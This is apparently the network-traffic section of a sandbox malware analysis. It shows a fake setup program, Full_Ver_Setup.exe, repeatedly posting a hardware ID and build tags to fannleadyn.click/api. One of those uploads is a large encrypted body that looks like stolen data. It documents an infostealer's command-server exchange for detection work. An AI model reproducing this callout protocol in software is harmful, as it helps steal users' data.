                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1684&rtt_var=643&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9659&delivery_rate=1686886&cwnd=225&unsent_bytes=0&cid=13d0f5aba1c54603&ts=806&x=0"
                                                                                                                                                                2024-12-22 22:30:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                2024-12-22 22:30:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.2.449739104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:28 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=XKLNRRWZBA
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 20388
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:28 UTC15331OUTData Raw: 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 58 4b 4c 4e 52 52 57 5a 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                Data Ascii: --XKLNRRWZBAContent-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--XKLNRRWZBAContent-Disposition: form-data; name="pid"3--XKLNRRWZBAContent-Disposition: form-data; name="lid"hRjzG3--ZINA--XKLNRRWZBAContent-D
                                                                                                                                                                2024-12-22 22:30:28 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78
                                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
                                                                                                                                                                2024-12-22 22:30:29 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:29 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=mrnphl0pcu9f8k193c63bj4jn3; expires=Thu, 17 Apr 2025 16:17:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4gQJB7gBFK3K3Af1ImgkKUVTfl%2FsfdQlNbHvN62f6Cvohy4OHE7cCuJH7oZBI2l0GKiHaMRiPFTeH3lenBGI%2FiCzfkxF9t55KGPCHMJ%2Fa8PB4cSIk3JJI4Et%2BeQsEiNt4Xe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e7fd9e60f45-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1551&rtt_var=586&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21342&delivery_rate=1882656&cwnd=157&unsent_bytes=0&cid=85faca64574218c6&ts=1036&x=0"
                                                                                                                                                                2024-12-22 22:30:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                2024-12-22 22:30:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.2.449741104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:31 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=ZA887B5551
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 7087
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:31 UTC7087OUTData Raw: 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 5a 41 38 38 37 42 35 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                Data Ascii: --ZA887B5551Content-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--ZA887B5551Content-Disposition: form-data; name="pid"1--ZA887B5551Content-Disposition: form-data; name="lid"hRjzG3--ZINA--ZA887B5551Content-D
                                                                                                                                                                2024-12-22 22:30:32 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=s2nm131pbmtu91p02hbtqk70re; expires=Thu, 17 Apr 2025 16:17:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv1uryKSA99vgUNZ9TbdSMksmIt0QVSLQm37cp1mSmqHE26YBaEVWBNHJWr4C2WNG%2Fg4c8hhtLzVYrqHPHMwP3PHS3CgyZfg2uGjv4%2Fkm0Km8ALn%2FnvgrUFd2EOt%2FDL2WKjD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e90cc0b43bf-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1561&rtt_var=611&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2839&recv_bytes=7996&delivery_rate=1753753&cwnd=252&unsent_bytes=0&cid=11da7dea4c36e7ba&ts=775&x=0"
                                                                                                                                                                2024-12-22 22:30:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                2024-12-22 22:30:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.2.449742104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:33 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=OFJH7NIY
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 1218
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:33 UTC1218OUTData Raw: 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 4f 46 4a 48 37 4e 49 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                Data Ascii: --OFJH7NIYContent-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--OFJH7NIYContent-Disposition: form-data; name="pid"1--OFJH7NIYContent-Disposition: form-data; name="lid"hRjzG3--ZINA--OFJH7NIYContent-Dispositi
                                                                                                                                                                2024-12-22 22:30:34 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:34 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=ptb7da2ctlgob51ulqmrf0v8hh; expires=Thu, 17 Apr 2025 16:17:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXFiaKMuf2kCocQEmJgGcDDsPSUVElJPfW31NMt%2B4nLdE0rV1pULfaM2H5YlmOWxF1D%2B3vDGbz0a%2F3pvTATw1dPG%2Fvm%2Fzi481FTCVYvDuLjwcq5ojBwvwO695N3Zg63K0YTo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8f638e9e4fd342a3-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2203&min_rtt=2195&rtt_var=841&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2125&delivery_rate=1288614&cwnd=160&unsent_bytes=0&cid=3ad4186134837c18&ts=780&x=0"
                                                                                                                                                                2024-12-22 22:30:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                2024-12-22 22:30:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.2.449743104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:36 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: multipart/form-data; boundary=JZQ0PHSKJH649G7IQS3
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 589758
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 2d 2d 4a 5a 51 30 50 48 53 4b 4a 48 36 34 39 47 37 49 51 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 44 38 32 37 38 41 37 45 43 31 45 46 32 32 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4a 5a 51 30 50 48 53 4b 4a 48 36 34 39 47 37 49 51 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 5a 51 30 50 48 53 4b 4a 48 36 34 39 47 37 49 51 53 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49
                                                                                                                                                                Data Ascii: --JZQ0PHSKJH649G7IQS3Content-Disposition: form-data; name="hwid"74D8278A7EC1EF22E9E2F0D64B3B48BA--JZQ0PHSKJH649G7IQS3Content-Disposition: form-data; name="pid"1--JZQ0PHSKJH649G7IQS3Content-Disposition: form-data; name="lid"hRjzG3--ZI
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: f8 d2 ac 20 56 a6 a6 e3 24 1f 08 57 bd b4 f0 8f c1 48 ae f9 cf 7b c1 1d 55 3a 6a 52 87 81 fa 30 d7 36 e8 91 c4 18 e0 b6 54 6e b4 55 cd 6d 35 ff c1 5c 8f 43 36 f7 fd 1b f2 02 2c 10 09 60 37 6e d3 54 1a ed d0 0e 58 31 67 b3 af d2 2e 02 1b ad a8 95 fd d0 63 d4 3b ed cc ce 27 2e b1 2a 48 af ab 7e fb ff 36 18 21 97 6b 80 fe a1 15 cc e0 40 8c 09 35 97 8d 14 9c 20 10 61 1a d6 1a a3 b1 1e f1 ac 3c 8a a7 08 6a 73 37 25 f0 60 24 bc c5 43 b1 6f b3 84 98 07 25 bb 05 80 4d 62 ba bd 1b 0e 34 ca 2d 5c 31 41 47 89 3c b7 2f 81 64 95 61 aa c8 76 91 06 cd 7b e3 53 4a 48 ec 17 63 96 50 87 24 dd 61 13 8a 1c 1c 88 7f f9 7b 5c 99 3b a1 19 47 ad 34 93 51 ef 87 a5 bb 8a 80 a5 0b 77 b2 a8 18 53 78 1e 33 47 49 dd 6a f4 75 96 63 d7 39 10 36 89 2b 72 d5 1b 75 26 23 3e b6 d2 54 32 33
                                                                                                                                                                Data Ascii: V$WH{U:jR06TnUm5\C6,`7nTX1g.c;'.*H~6!k@5 a<js7%`$Co%Mb4-\1AG</dav{SJHcP$a{\;G4QwSx3GIjuc96+ru&#>T23
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 6c 18 c2 1b a9 4f f5 d1 1a 24 7a 05 a3 11 b3 6d 84 07 97 96 6b be c7 5b cb 96 58 ee b8 2c 17 f4 e0 59 bc 19 9b 85 a4 47 8a 6d d3 ad 63 a8 ef bc d9 71 54 5b b0 63 2e 20 aa f1 1f 82 fe b6 f5 42 cd 25 58 43 43 fa 64 a4 fc 48 75 0c 58 4a a1 11 87 a5 87 d2 cd ee ca 1c 85 d7 8c 43 cd 62 89 9e 38 32 66 41 e7 7a e3 27 bd 99 30 a5 36 33 d8 bf c5 28 6a e5 3b 36 ca d3 7b c3 63 80 64 cf f8 29 7a d2 da 55 26 c8 7b 0f 79 6e e8 69 04 f9 a7 80 9d 27 bf 6a b6 d2 46 86 a7 c5 f8 f6 90 f1 4b 4b 8b 10 47 01 fc 01 ce 73 c9 ed 53 af 9a bf c8 31 60 7f af f9 9e 9e a0 a9 99 73 91 19 73 1f 35 91 78 7f 52 ba e3 77 3c 8a d8 fc ac fa e7 7a 93 14 43 99 d3 76 87 68 16 f8 63 ad f1 2c 01 55 fb 97 6d f3 57 c5 fa c0 bd ec e1 54 a7 55 d2 48 03 6a ec 32 b0 88 a6 e2 67 f0 cb 92 bf 8a 88 67 9c
                                                                                                                                                                Data Ascii: lO$zmk[X,YGmcqT[c. B%XCCdHuXJCb82fAz'063(j;6{cd)zU&{yni'jFKKGsS1`ss5xRw<zCvhc,UmWTUHj2gg
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 5f 8a 89 81 a9 61 25 f3 13 68 84 1b c7 84 cc 88 7f c2 7e 08 03 92 d9 bf 60 6f 2e 2e 54 91 1d d3 9e a1 9a 9f c0 29 a5 3d 02 6c a1 ea 39 09 af 5e 80 3b a9 03 d6 6f 6f be ba b8 c1 34 5a 10 00 77 03 4a 0e 7e e8 57 e0 e0 a0 f6 c3 70 0a ad af 35 22 dd e7 a1 63 6f 56 66 e7 6e 59 0f 4b 0b b7 9e f1 66 3a 70 1e 09 7e 57 8d 19 75 1e f9 47 a9 92 bd 3e 75 69 0e eb 33 48 bb d9 3a 64 f6 e0 30 f7 ee 5e 81 3c 5d 04 f6 91 11 89 eb 7c 99 a1 f6 41 ee 28 07 c6 4e 83 6c dd 21 ff 6b c2 60 e1 ac 20 58 0e 63 ef 04 0e 7d e2 76 c6 10 41 3f 87 55 b3 cf d7 ef 0d 38 8b 99 ae 1f 10 72 8c b0 dc 08 d9 f5 10 4c ec 38 36 84 63 5d cc f8 d7 ee 2b 95 c3 a4 af b2 3e 93 3a 7a ed b2 e3 1f 09 b3 83 a1 af 89 e4 49 7f e9 d8 8a e8 03 a8 e2 59 ff 58 37 79 83 1f 7b de 9a e0 0b c3 ac 95 41 32 59 5b f9
                                                                                                                                                                Data Ascii: _a%h~`o..T)=l9^;oo4ZwJ~Wp5"coVfnYKf:p~WuG>ui3H:d0^<]|A(Nl!k` Xc}vA?U8rL86c]+>:zIYX7y{A2Y[
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 91 79 54 f7 3f f9 42 e3 c9 86 24 51 a0 7b e9 2a fc e8 ef 77 d8 0e f3 58 1e a4 d9 bf 6e 12 dc 89 26 d2 72 a1 48 0f ff 75 47 5c de d2 8f 7a 93 98 5b 18 ee 6e 47 cf b4 a8 e9 83 67 b3 3d 32 c2 39 1c 5f 1c 5c f0 cc 5f be a4 bf 23 8a fc d8 15 55 68 9c c1 c8 bb 82 bb 93 b8 3b b3 27 7a a9 0d 00 01 59 28 0c 15 91 0b 03 bc 19 31 7a 3f 1a 41 64 32 9c 20 e6 86 93 8d f8 f1 be fe d7 7e 59 88 7c 43 b0 67 eb 7f 45 c8 ff eb a6 8c e3 1c e5 69 0e 80 f2 4d 1e 76 9e 3b 9b d3 4e 41 b1 c8 9f 1f 3c 9c 29 bb 99 e7 43 a4 d4 3e 6c cd bc c6 0b 0e ab f3 c1 08 90 71 7d 4d 87 f4 5f fb 21 21 16 8f e5 3a ba dd ea 37 27 b5 b5 f9 f8 db 83 3a ab 92 33 41 79 42 a3 58 70 16 b2 e7 02 66 ab 08 2d 97 1b 32 90 32 bd 88 b4 0f e7 8f 10 9e ba e6 a7 06 9c d1 2b d7 26 7a 2b 91 5b f2 73 28 d0 a5 17 31
                                                                                                                                                                Data Ascii: yT?B$Q{*wXn&rHuG\z[nGg=29_\_#Uh;'zY(1z?Ad2 ~Y|CgEiMv;NA<)C>lq}M_!!:7':3AyBXpf-22+&z+[s(1
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 24 fd 8a 11 9f 90 14 c7 6d eb ff dd 00 f0 c3 40 db ed 7b 75 2f 01 92 8e 7b 1d ff 5a ca 2b 50 94 75 6d c4 23 01 8b ee f5 00 39 49 85 4f df d5 ed 4e 44 40 7b da 89 24 cf 1a d9 1a d2 9e 53 29 17 04 eb 84 81 66 b7 10 29 7e 53 ec 27 ac d3 e5 85 cb ac 47 f6 c5 dd 6b b2 6d 56 c6 fb f7 e3 73 df c0 92 ce c9 7b c0 c8 18 c0 cb f2 4c 77 6b 40 70 65 62 f7 6f a7 b1 9a 4c 89 c2 dc 63 b0 38 ff a5 d4 fd f8 63 b0 bf 52 29 2e 18 59 8a d4 66 e9 87 55 ce 9c 9e 26 5b 62 e7 8f d6 2b 62 9b 18 d9 99 a5 f1 80 c7 c9 89 73 98 65 84 d0 3c 8c b9 fe ec 30 bb 48 c5 53 d3 97 73 82 fd 3d 90 a2 f9 11 b4 35 06 77 2d 37 55 cf f0 ec 5b 32 7f 6b 9e 84 c4 23 a8 da 7b 70 b8 24 15 53 85 f4 30 fd 16 54 89 40 c3 90 52 c0 cc e8 0f 57 ae e3 19 87 ec 90 8c d1 a2 24 1d e5 e0 45 4e 11 13 7b 7c 18 d3 15
                                                                                                                                                                Data Ascii: $m@{u/{Z+Pum#9IOND@{$S)f)~S'GkmVs{Lwk@peboLc8cR).YfU&[b+bse<0HSs=5w-7U[2k#{p$S0T@RW$EN{|
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 1c e4 19 77 ac 8b 3e 45 9f 8c 2b 41 44 24 29 3f d8 d0 9f a1 4a 43 a4 43 dc 7c 89 a7 bf 80 11 f3 bb 86 76 92 fe f5 85 6e 08 e0 5b bf 78 9a f7 28 0c 3d b8 4e a1 84 3d 96 a8 8f 7c d9 b4 3b a8 b2 83 c7 21 1e d5 20 9a c3 70 fb b7 28 3c 72 b1 5c 07 ce f7 5e be 08 9b 21 80 94 4e 5d 6e 4a 56 ce fa a4 cd 68 85 11 67 27 3a c4 48 35 26 5f 42 ca b1 01 12 95 f2 47 a0 f6 93 42 0c b6 bf 5e 32 14 2a b8 f5 3a 9e 66 ab 03 20 4e c2 67 ce 72 5f 6e e8 fa 77 fb 04 69 60 59 3d fd 98 1f cc e9 c3 06 94 40 f0 21 24 05 62 0c 47 89 80 c6 22 ca 5e dd de 0f 2e e4 92 a5 f7 ef da bf ae da 3d b0 1b 1e 1a 80 b1 06 bc 5b cf 78 d4 6c 4e 00 20 97 0d 96 a2 e4 1f 1b bd bb 71 8b 13 e8 72 95 62 35 9c 4a 02 45 69 c3 33 4d 79 1f 75 4c 48 68 9e 1b 02 5e c3 3a 16 1e 2e b3 1f b9 d8 05 83 5e e3 22 a4
                                                                                                                                                                Data Ascii: w>E+AD$)?JCC|vn[x(=N=|;! p(<r\^!N]nJVhg':H5&_BGB^2*:f Ngr_nwi`Y=@!$bG"^.=[xlN qrb5JEi3MyuLHh^:.^"
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: ef 67 f7 9f e1 14 ee 55 c8 65 2e 79 ec 51 d1 c2 83 bd 6e bf 74 78 57 38 88 9e b4 9b ae 83 a2 7f 4a de a8 f9 7b 48 ab bd 6b 63 b0 fa 66 b8 20 ef fc 9e 87 01 6d 97 30 cf 4d c2 72 2a 02 6e 15 de f8 f3 dc 62 77 f8 f9 d3 c0 1c d4 16 3d fc ea 63 33 aa 4a 53 4c 38 a0 de a7 0b 8c 7e ed 0e 5a 09 58 c4 ad ea 7c 1d 14 08 09 0f 5f 18 1c f2 41 b0 a1 1e a5 d2 e2 65 b7 39 99 8a 32 5e 8d 4f c6 64 51 c3 58 37 25 f5 e7 66 d5 fc 74 0c 87 e9 66 bc 78 71 8a 39 dd 72 17 01 8c 4d d2 83 7e 2c 5e df 7a 65 c4 8b 46 ea 87 b3 fb 4b be 66 f6 eb c7 62 0f 50 55 d8 63 87 d3 4f 7f 64 7a bc 0f e9 68 83 6e 6f 26 ff 14 b2 64 cd 24 f3 97 bc 37 71 4f b5 3e a1 46 bf 7f f9 d1 f0 13 d0 52 79 78 e3 1f bb c7 e9 f9 e7 84 58 c3 7b a0 ed ec de aa 69 3e 45 d9 8d 39 c3 0d 19 db 15 3b 8d 02 f3 45 dd 97
                                                                                                                                                                Data Ascii: gUe.yQntxW8J{Hkcf m0Mr*nbw=c3JSL8~ZX|_Ae92^OdQX7%ftfxq9rM~,^zeFKfbPUcOdzhno&d$7qO>FRyxX{i>E9;E
                                                                                                                                                                2024-12-22 22:30:36 UTC15331OUTData Raw: 56 ea 9a 18 08 72 42 03 85 81 7d 6f d8 19 fd ee ed 82 78 ff b8 55 7f db 7c d0 62 11 f6 b6 fc 11 d4 f5 16 89 5f 04 98 ea 0b d7 51 6c 69 50 fa 04 99 d2 63 43 ec 7a 85 7a ae f4 db 8e 95 4d 79 2c 3e de 29 0c a2 36 4b 3e 85 db bd 9b 4b 64 24 8e 89 cf e9 8b 84 ae 71 9c a5 c1 ba 9b 3a 20 aa 10 98 13 eb 59 7b 6d dd 04 24 04 10 b2 a7 cf b2 4d fc a0 d2 bb 58 9f a7 e9 d2 b7 1d 2c 33 9c b2 8d 84 85 61 9b e1 aa a8 90 b3 df aa 2f 3f 50 0a f7 dc 2c 49 20 a3 a3 0d 78 62 e2 2e 26 6f 9a 19 a3 c2 8c 8d 10 39 ec a5 ea 14 4c a3 5e 81 45 68 d0 53 f5 cd 46 ed c3 cc 26 c1 11 13 92 b9 76 d3 72 9b 9a b6 2a 23 95 97 3d 4f 25 60 1e 62 0b a4 43 dd 3f 25 17 24 ea 80 19 83 11 4e 05 d3 18 39 77 80 6c ac a8 3f 25 66 89 8e 2c c3 88 0b bf 54 84 71 9b ed 90 9e 5a 81 2d a4 d2 17 96 ba 26 93
